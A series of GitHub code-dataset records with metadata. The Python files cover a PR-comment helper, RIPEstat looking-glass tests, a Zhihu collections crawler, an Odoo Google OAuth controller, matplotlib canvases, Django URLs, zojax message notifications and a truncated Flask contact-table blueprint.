REVIEWS)\n line_comments = get_line_comments(pr_url + \"/\" + COMMENTS)\n comments = review_comments + line_comments\n return comments\n\n\ndef get_review_comments(url):\n reviews = get_data_collection_from_github_api(url)\n\n review_comments = []\n for review in reviews:\n if review[BODY] and review[STATE] != PENDING:\n value = {USER: review[USER][LOGIN], BODY: review[BODY], SUBMITTED_AT: review[SUBMITTED_AT]}\n review_comments.append(value)\n\n return review_comments\n\n\ndef get_line_comments(url):\n comments = get_data_collection_from_github_api(url)\n line_comments = []\n for comment in comments:\n value = {USER: comment[USER][LOGIN], BODY: comment[BODY], SUBMITTED_AT: comment[UPDATED_AT]}\n line_comments.append(value)\n\n return line_comments\n\n\ndef get_changed_files(merge_commit_url):\n merge_commit_data = get_single_data_from_github_api(merge_commit_url)\n files_changed = []\n for file in merge_commit_data[FILES]:\n entry = {FILENAME: file[FILENAME], STATUS: file[STATUS], ADDITIONS: file[ADDITIONS], DELETIONS: file[DELETIONS]}\n files_changed.append(entry)\n\n return files_changed\n\n\ndef get_requested_reviewers(requested_reviewers):\n output = []\n for reviewer in requested_reviewers:\n user = {USER: reviewer[LOGIN]}\n output.append(user)\n return output\n\n\ndef get_merged_by(merged_by):\n if merged_by is None:\n return None\n else:\n return merged_by[LOGIN]\n", "repo_name": "sammarth-kapse/webhook_events", "sub_path": "helper_functions.py", "file_name": "helper_functions.py", "file_ext": "py", "file_size_in_byte": 3945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "5443576657", "text": "\"\"\"Test prsw.api.looking_glass.\"\"\"\n\nimport pytest\nfrom datetime import datetime\nfrom typing import Iterable\nfrom unittest.mock import patch\n\nfrom .. import UnitTest\n\nfrom prsw.api import API_URL, Output\nfrom prsw.stat.looking_glass import LookingGlass\n\n\nclass TestLookingGlass(UnitTest):\n RESPONSE = {\n \"messages\": [],\n \"see_also\": [],\n \"version\": \"2.1\",\n \"data_call_status\": \"supported\",\n \"cached\": False,\n \"data\": {\n \"rrcs\": [\n {\n \"rrc\": \"RRC00\",\n \"location\": \"Amsterdam, Netherlands\",\n \"peers\": [\n {\n \"asn_origin\": \"1205\",\n \"as_path\": \"34854 6939 1853 1853 1205\",\n \"community\": \"34854:1009\",\n \"last_updated\": \"2021-04-15T08:21:07\",\n \"prefix\": \"140.78.0.0/16\",\n \"peer\": \"2.56.11.1\",\n \"origin\": \"IGP\",\n \"next_hop\": \"2.56.11.1\",\n \"latest_time\": \"2021-04-15T12:51:19\",\n },\n ],\n },\n ],\n \"query_time\": \"2021-04-15T12:51:22\",\n \"latest_time\": \"2021-04-15T12:51:04\",\n \"parameters\": {\"resource\": \"140.78.0.0/16\"},\n },\n \"query_id\": \"20210415125122-96ed15ff-31d8-41b9-b1d0-d0c3f293f0c1\",\n \"process_time\": 79,\n \"server_id\": \"app114\",\n \"build_version\": \"live.2021.4.14.157\",\n \"status\": \"ok\",\n \"status_code\": 200,\n \"time\": \"2021-04-15T12:45:22.211516\",\n }\n\n def setup_method(self):\n url = f\"{API_URL}{LookingGlass.PATH}data.json?resource=140.78.0.0/16\"\n\n self.api_response = Output(url, **TestLookingGlass.RESPONSE)\n self.params = {\n \"preferred_version\": LookingGlass.VERSION,\n \"resource\": \"140.78.0.0/16\",\n }\n\n return super().setup_method()\n\n @pytest.fixture(scope=\"session\")\n def mock_get(self):\n self.setup_method()\n\n with patch.object(self.ripestat, \"_get\") as mocked_get:\n mocked_get.return_value = self.api_response\n\n yield self\n\n mocked_get.assert_called_with(LookingGlass.PATH, self.params)\n\n def test__init__valid_resource(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n assert isinstance(response, LookingGlass)\n\n def test__init__invalid_resource(self):\n with pytest.raises(ValueError):\n LookingGlass(self.ripestat, resource=\"invalid-prefix\")\n\n def test__getitem__(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n assert isinstance(response[\"RRC00\"], tuple) # namedtuple: RRC by RRC key\n\n def test__iter__(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n assert isinstance(response, Iterable)\n\n def test__len__(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n assert len(response) == len(TestLookingGlass.RESPONSE[\"data\"][\"rrcs\"])\n\n def test_objectify_rrcs(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n for collector in response:\n assert isinstance(collector, tuple) # namedtuple: RRC\n assert \"rrc\" in collector.__dir__()\n assert \"location\" in collector.__dir__()\n assert \"peers\" in collector.__dir__()\n\n for peer in collector.peers:\n assert isinstance(peer, tuple) # namedtuple: Peer\n assert \"asn_origin\" in peer.__dir__()\n assert \"as_path\" in peer.__dir__()\n assert \"community\" in peer.__dir__()\n assert \"last_updated\" in peer.__dir__()\n assert \"prefix\" in peer.__dir__()\n assert \"peer\" in peer.__dir__()\n assert \"origin\" in peer.__dir__()\n assert \"next_hop\" in peer.__dir__()\n assert \"latest_time\" in peer.__dir__()\n\n def test_latest_time(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n latest_time = TestLookingGlass.RESPONSE[\"data\"][\"latest_time\"]\n assert response.latest_time == datetime.fromisoformat(latest_time)\n\n def test_query_time(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n time = TestLookingGlass.RESPONSE[\"data\"][\"query_time\"]\n assert response.query_time == datetime.fromisoformat(time)\n\n def test_peers(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n assert isinstance(response.peers, list)\n\n for peer in response.peers:\n assert isinstance(peer, tuple) # namedtuple: Peer\n\n def test_rrcs(self, mock_get):\n response = LookingGlass(mock_get.ripestat, resource=self.params[\"resource\"])\n\n assert isinstance(response.rrcs, dict)\n\n for name, route_server in response.rrcs.items():\n assert isinstance(name, str) # RRC name: 'RRC00'\n assert isinstance(route_server, tuple) # namedtuple: RRC\n", "repo_name": "jvoss/prsw", "sub_path": "tests/unit/stat/test_looking_glass.py", "file_name": "test_looking_glass.py", "file_ext": "py", "file_size_in_byte": 5401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "prsw.api.API_URL", "line_number": 55, "usage_type": "name"}, {"api_name": "prsw.stat.looking_glass.LookingGlass.PATH", "line_number": 55, "usage_type": "attribute"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 55, "usage_type": "name"}, {"api_name": "prsw.api.Output", "line_number": 57, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass.VERSION", "line_number": 59, "usage_type": "attribute"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 59, "usage_type": "name"}, {"api_name": "unittest.mock.patch.object", "line_number": 69, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 69, "usage_type": "name"}, {"api_name": "prsw.stat.looking_glass.LookingGlass.PATH", "line_number": 74, "usage_type": "attribute"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 74, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 65, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 77, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 78, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 81, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 82, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 85, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 89, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 90, "usage_type": "argument"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 93, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 97, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 118, "usage_type": "call"}, {"api_name": "datetime.datetime.fromisoformat", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 121, "usage_type": "name"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 124, "usage_type": "call"}, {"api_name": "datetime.datetime.fromisoformat", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "name"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 130, "usage_type": "call"}, {"api_name": "prsw.stat.looking_glass.LookingGlass", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "73376455205", "text": "from __future__ import unicode_literals, print_function\nfrom RedisQueue import RedisQueue\nfrom zhihu_oauth import ZhihuClient, Answer, Article\nimport datetime\nimport time\nimport random\nimport sys\nfrom timeout import timeout\nimport os\nfrom utils import print_err\nfrom pymongo import MongoClient\n\nMAX_SLEEP_TIME = 15\nCookies_File = './cookies/cookies%s.json' % sys.argv[1]\nglobal client\nclient = ZhihuClient()\nif os.path.isfile(Cookies_File):\n client.load_token(Cookies_File)\nelse:\n client_info = open('./cookies/client_info_list.data').readlines()\n client_info = client_info[int(sys.argv[1])].strip().split('\\t')\n client.login_in_terminal(client_info[0], client_info[1])\n client.save_token(Cookies_File)\n\n\ndef get_user_collections(uname):\n global client\n if uname == '':\n return\n print(uname)\n\n user_collections = dict()\n try:\n people = client.people(uname)\n user_collections['_id'] = uname\n user_collections['owner'] = uname\n user_collections['collections'] = dict()\n for collection in people.collections:\n user_collections['collections'][collection.title] = []\n for content in collection.contents:\n c_id = content.id\n q_id = -1\n if isinstance(content, Answer):\n title = content.question.title\n q_id = content.question.id\n elif isinstance(content, Article):\n title = content.title\n user_collections['collections'][collection.title].append({\n 'id': c_id,\n 'q_id': q_id,\n 'title': title,\n #'detail': q.detail,\n })\n except Exception as e:\n print_err(e)\n print_err(uname)\n ferr = open('./err.out', 'a')\n ferr.write(uname + '\\n')\n print_err(\"Something wrong when try to get user's collections\")\n time.sleep(random.uniform(0, 5))\n\n return user_collections\n\n\nif __name__ == '__main__':\n q = RedisQueue('answer_queue')\n sleep_time = 0\n db = MongoClient().zhihu.zhihu_collections\n while 1:\n if (q.empty()):\n print('Finished at %s' % str(datetime.datetime.now()))\n print('Waiting ...')\n uname = q.get()\n try:\n uname = uname.decode()\n except:\n continue\n if db.find({'_id': uname}).count() > 0:\n continue\n\n try:\n with timeout(seconds=40):\n all_collections = get_user_collections(uname)\n if all_collections == {}:\n continue\n elif all_collections is None:\n sleep_time += random.uniform(1, 5)\n print_err('Sleeping for %0.2f seconds' % sleep_time)\n time.sleep(sleep_time)\n else:\n db.insert(all_collections)\n sleep_time -= 1\n sleep_time = max(0, sleep_time)\n time.sleep(random.uniform(1, 3))\n except TimeoutError:\n print_err('Timeout!')\n sleep_time += random.uniform(1, 5)\n print_err('Sleeping for %0.2f seconds' % sleep_time)\n time.sleep(sleep_time)\n except Exception as e:\n print_err('Unknown exception!!')\n print_err(e)\n if sleep_time > MAX_SLEEP_TIME:\n # refresh the client\n print_err('Refresh client!')\n client = ZhihuClient(Cookies_File)\n sleep_time = 0\n print('Done')\n", "repo_name": "Adoni/ZhihuCrawler", "sub_path": "user_collections.py", "file_name": "user_collections.py", "file_ext": "py", "file_size_in_byte": 3589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "zhihu_oauth.ZhihuClient", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "zhihu_oauth.Answer", "line_number": 43, "usage_type": "argument"}, {"api_name": "zhihu_oauth.Article", "line_number": 46, "usage_type": "argument"}, {"api_name": "utils.print_err", "line_number": 55, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 60, "usage_type": "call"}, {"api_name": "RedisQueue.RedisQueue", "line_number": 66, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "attribute"}, {"api_name": "timeout.timeout", "line_number": 82, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 88, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 96, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 97, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 99, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.print_err", "line_number": 105, "usage_type": "call"}, {"api_name": "zhihu_oauth.ZhihuClient", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "40477041827", "text": "import datetime\nimport requests\nfrom odoo import http, _\nfrom odoo.exceptions import UserError\n\n\nclass GoogleTaskAuth(http.Controller):\n \"\"\"Controller for Google Task Authentication\"\"\"\n @http.route('/google_task_authentication', type=\"http\", auth=\"public\",\n website=True)\n def get_auth_code(self, **kw):\n \"\"\"Get the authentication code from Google and save access tokens\"\"\"\n project_cred = http.request.env.ref(\n 'odoo_google_tasks_integration.project_google_credential_data')\n if kw.get('code'):\n project_cred.write(\n {'hangout_company_authorization_code': kw.get('code')})\n data = {\n 'code': kw.get('code'),\n 'client_id':project_cred.hangout_client,\n 'client_secret': project_cred.hangout_client_secret,\n 'redirect_uri': project_cred.hangout_redirect_uri,\n 'grant_type': 'authorization_code'\n }\n response = requests.post(\n 'https://accounts.google.com/o/oauth2/token',\n data=data,\n headers={'content-type': 'application/x-www-form-urlencoded'})\n if response.json() and response.json().get('access_token'):\n project_cred.write({\n 'hangout_company_access_token': response.json().get(\n 'access_token'),\n 'hangout_company_access_token_expiry':\n datetime.datetime.now() + datetime.timedelta(\n seconds=response.json().get('expires_in')),\n 'hangout_company_refresh_token': response.json().get(\n 'access_token'),\n })\n return \"Authentication Success. You can close this window.\"\n else:\n raise UserError(\n _('Something went wrong during the token generation.'\n 'Maybe your Authorization Code is invalid')\n )\n", "repo_name": "CybroOdoo/CybroAddons", "sub_path": "odoo_google_tasks_integration/controllers/odoo_google_tasks_integration.py", "file_name": "odoo_google_tasks_integration.py", "file_ext": "py", "file_size_in_byte": 2025, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 204, "dataset": "github-code", "pt": "52", "api": [{"api_name": "odoo.http.Controller", "line_number": 7, "usage_type": "attribute"}, {"api_name": "odoo.http", "line_number": 7, "usage_type": "name"}, {"api_name": "odoo.http.request.env.ref", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.http.request", "line_number": 13, "usage_type": "attribute"}, {"api_name": "odoo.http", "line_number": 13, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 34, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 41, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 42, "usage_type": "call"}, {"api_name": "odoo.http.route", "line_number": 9, "usage_type": "call"}, {"api_name": "odoo.http", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "16314046891", "text": "from matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as Canvas\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Qt5Agg')\n\n\nclass Canvas3D(Canvas):\n def __init__(self):\n self.fig = plt.figure()\n Canvas.__init__(self, self.fig)\n self.axes = self.fig.gca(projection='3d')\n\n def drawGraph(self, x, t, C): # Fun for Graph plotting\n x, t = np.meshgrid(x, t)\n self.axes.clear()\n # plots the 3D surface plot\n surf = self.axes.plot_surface(x, t, C, cmap='jet')\n self.axes.set_xlabel('Space (cm)')\n self.axes.set_ylabel('Time (s)')\n self.axes.set_zlabel('Concentration')\n self.fig.colorbar(surf, shrink=0.5, aspect=5)\n self.draw_idle()\n\n\nclass Canvas2D(Canvas):\n def __init__(self):\n self.fig = plt.figure(tight_layout=True)\n Canvas.__init__(self, self.fig) # creating FigureCanvas\n self.axes = self.fig.gca()\n\n def drawGraph(self, x, t, C, userTimeInput=list()):\n self.axes.clear()\n\n if userTimeInput:\n userInput = list(userTimeInput)\n idx_userInput = 0\n counter = 0\n colCount = 4\n for idx, n in enumerate(t):\n if t[idx] == userInput[idx_userInput]:\n self.axes.plot(x, C[idx, :], label=f'$t={int(t[idx])}\\ s$')\n idx_userInput += 1\n counter += 1\n if idx_userInput == len(userInput):\n break\n if counter//colCount == 0:\n counter = colCount\n if len(userInput) <= 12:\n self.axes.legend(\n prop={'size': 6}, loc='upper left', bbox_to_anchor=(1.04, 1))\n elif len(userInput) > 12:\n self.axes.legend(\n ncol=counter//colCount, prop={'size': 6}, loc='lower right', bbox_to_anchor=(1, 0))\n\n else:\n counter = 0\n for idx, n in enumerate(t):\n if t[idx] % 1 == 0 and t[idx] > 0:\n self.axes.plot(x, C[idx, :], label=f'$t={int(t[idx])}\\ s$')\n counter += 1\n if counter//5 == 0:\n counter = 5\n if counter <= 6:\n self.axes.legend(ncol=counter//5)\n self.axes.set_xlabel('Space (cm)')\n self.axes.set_ylabel('Time (s)')\n self.draw_idle()\n\n def clearGraph(self):\n self.axes.clear()\n self.draw_idle()\n", "repo_name": "will004/air-pollution-skripsi", "sub_path": "ui/outputs/canvas.py", "file_name": "canvas.py", "file_ext": "py", "file_size_in_byte": 2572, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 14, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg.__init__", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt5agg.FigureCanvasQTAgg", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "33936503377", "text": "\"\"\"service_catalog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.urls import include, path\nfrom django.contrib import admin\nfrom .api import router\nfrom app1 import views\nfrom app1.api_views import *\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token\nfrom rest_framework.authtoken.views import ObtainAuthToken\n\nadmin.site.site_title = 'Service metrics'\n\nurlpatterns = [\n\n url(r'^admin/', admin.site.urls),\n\n url(r'^idealweight/',views.IdealWeight),\n\n path(r'api/v1/', include(router.urls)),\n\n path('staff/', StaffView.as_view()),\n\n path('api/portfolios/', PortfolioView.as_view()),\n\n path('api/subportfolios/', PortSubPort.as_view()),\n\n path('api/subportfolios/', SubPortfolioView.as_view()),\n\n path('api/services/', ServiceView.as_view()),\n\n path('api/services/', SubPortService.as_view()),\n\n path('api/services//', ServiceView.as_view()),\n\n path('api/metrics/', MetricView.as_view()),\n\n path('api/metric_values/', MetricValueView.as_view()),\n\n path('api/users/', UserViewSet.as_view()),\n\n url(r'', admin.site.urls),\n\n path(r'api-token-auth/', obtain_jwt_token),\n\n path(r'api-token-refresh/', refresh_jwt_token),\n\n path(r'auth/', ObtainAuthToken.as_view())\n\n\n]\n", "repo_name": "roman1005/servmet", "sub_path": "service_catalog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.site", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 29, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "app1.views.IdealWeight", "line_number": 31, "usage_type": "attribute"}, {"api_name": "app1.views", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "api.router.urls", "line_number": 33, "usage_type": "attribute"}, {"api_name": "api.router", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 55, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 55, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 55, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.obtain_jwt_token", "line_number": 57, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.refresh_jwt_token", "line_number": 59, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.views.ObtainAuthToken.as_view", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.views.ObtainAuthToken", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "31674753891", "text": "from email.Utils import formataddr\n\nfrom zope import interface, component\nfrom zope.component import queryUtility, getMultiAdapter\n\nfrom zope.traversing.browser import absoluteURL\nfrom zope.app.component.hooks import getSite\nfrom zope.security.management import queryInteraction\nfrom zope.lifecycleevent.interfaces import IObjectCreatedEvent\n\nfrom zojax.mail.interfaces import IMailAddress\nfrom zojax.mailtemplate.interfaces import IMailTemplate\n\nfrom zojax.formatter.utils import getFormatter\n\nfrom zojax.messaging.interfaces import IMessage\nfrom zojax.messaging.interfaces import IMessageService\nfrom zojax.messaging.interfaces import IMessageCreatedEvent\nfrom zojax.messaging.interfaces import IPortalMessagingPreference\n\n\nclass MessageTemplate(object):\n\n contentType = 'text/html'\n\n def update(self):\n super(MessageTemplate, self).update()\n\n context = self.context\n request = self.request\n\n formatter = getFormatter(request, 'fancyDatetime', 'medium')\n\n self.date = formatter.format(context.__date__)\n self.service = context.__parent__\n\n storage = self.service.__parent__\n self.url = '%s/%s/'%(absoluteURL(storage, request), context.__name__)\n\n @property\n def subject(self):\n msg = u'You have been received new message.'\n\n title = getattr(getSite(), 'title', u'')\n if title:\n return u'%s: %s'%(title, msg)\n else:\n return msg\n\n @property\n def messageId(self):\n return '<%s@zojax>'%self.context.__uid__\n\n\n@component.adapter(IMessage, IMessageCreatedEvent)\ndef messageCreated(message, event):\n principal = event.storage.principal\n\n prefs = IPortalMessagingPreference(principal)\n if not prefs.notify:\n return\n\n email = IMailAddress(principal, None)\n if email:\n request = queryInteraction().participations[0]\n template = getMultiAdapter(\n (message, request), IMailTemplate, 'template-created')\n template.addHeader(u'To', formataddr((principal.title, email.address)))\n template.send((email.address,))\n", "repo_name": "Zojax/zojax.messaging", "sub_path": "src/zojax/messaging/browser/template.py", "file_name": "template.py", "file_ext": "py", "file_size_in_byte": 2091, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "zojax.formatter.utils.getFormatter", "line_number": 32, "usage_type": "call"}, {"api_name": "zope.traversing.browser.absoluteURL", "line_number": 38, "usage_type": "call"}, {"api_name": "zope.app.component.hooks.getSite", "line_number": 44, "usage_type": "call"}, {"api_name": "zojax.messaging.interfaces.IPortalMessagingPreference", "line_number": 59, "usage_type": "call"}, {"api_name": "email.Utils", "line_number": 63, "usage_type": "name"}, {"api_name": "zojax.mail.interfaces.IMailAddress", "line_number": 63, "usage_type": "call"}, {"api_name": "email.Utils", "line_number": 64, "usage_type": "name"}, {"api_name": "zope.security.management.queryInteraction", "line_number": 65, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 66, "usage_type": "call"}, {"api_name": "zojax.mailtemplate.interfaces.IMailTemplate", "line_number": 67, "usage_type": "argument"}, {"api_name": "email.Utils.formataddr", "line_number": 68, "usage_type": "call"}, {"api_name": "email.Utils.address", "line_number": 68, "usage_type": "attribute"}, {"api_name": "email.Utils", "line_number": 68, "usage_type": "name"}, {"api_name": "email.Utils.address", "line_number": 69, "usage_type": "attribute"}, {"api_name": "email.Utils", "line_number": 69, "usage_type": "name"}, {"api_name": "zope.component.adapter", "line_number": 55, "usage_type": "call"}, {"api_name": "zojax.messaging.interfaces.IMessage", "line_number": 55, "usage_type": "argument"}, {"api_name": "zojax.messaging.interfaces.IMessageCreatedEvent", "line_number": 55, "usage_type": "argument"}, {"api_name": "zope.component", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "74662668323", "text": "from flask import Blueprint, render_template, jsonify, request\nfrom flask_login import login_required, current_user # Added current_user here\nfrom models import db, ContactTable, LogsTable\nfrom datetime import datetime\n\nfrom datetime import datetime\n\ncontact_bp = Blueprint('contact_table', __name__, template_folder='../templates/group0')\n\n@contact_bp.route('/contact_table')\n@login_required\ndef contact_table():\n current_table, tables = get_menu_context('Cadastre Table')\n return render_template('group1/contact_table.html', tables=tables, current_table=current_table)\n\n@contact_bp.route('/get_contact_data')\n@login_required\ndef get_contact_data():\n contacts = ContactTable.query.all()\n data = [{'CONTACT_ID': c.CONTACT_ID, 'CONTACT_NAME': c.CONTACT_NAME, 'CONTACT_EMAIL': c.CONTACT_EMAIL, 'CONTACT_PHONE': c.CONTACT_PHONE} for c in contacts]\n return jsonify(data)\n\n@contact_bp.route('/update_contact_table', methods=['POST'])\n@login_required\ndef update_contact_table():\n # extract data from form\n table_id = request.form.get('table_id') # the ID of the row to be updated\n column_name = request.form.get('column_name') # the name of the column to be updated\n new_value = request.form.get('new_value') # the new value for the column\n user = current_user.username # get current user's username\n\n # Get the old value before updating\n old_value = db.session.query(ContactTable).filter(ContactTable.CONTACT_ID == table_id).first().__getattribute__(column_name)\n\n # Perform the update operation\n db.session.query(ContactTable).filter(ContactTable.CONTACT_ID == table_id).update({column_name: new_value})\n\n # Log the update operation\n log = LogsTable(table_name='Contact Table', variable_name=column_name, table_id=table_id, old_value=old_value, new_value=new_value, user=user, date_update=datetime.now(), update_type=\"Update\")\n db.session.add(log)\n\n # Commit the changes\n db.session.commit()\n\n return jsonify(success=True)\n", "repo_name": "LucaSiila/CRUD---WEBAPP", "sub_path": "blueprints/contact_table.py", "file_name": "contact_table.py", "file_ext": "py", "file_size_in_byte": 1983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": 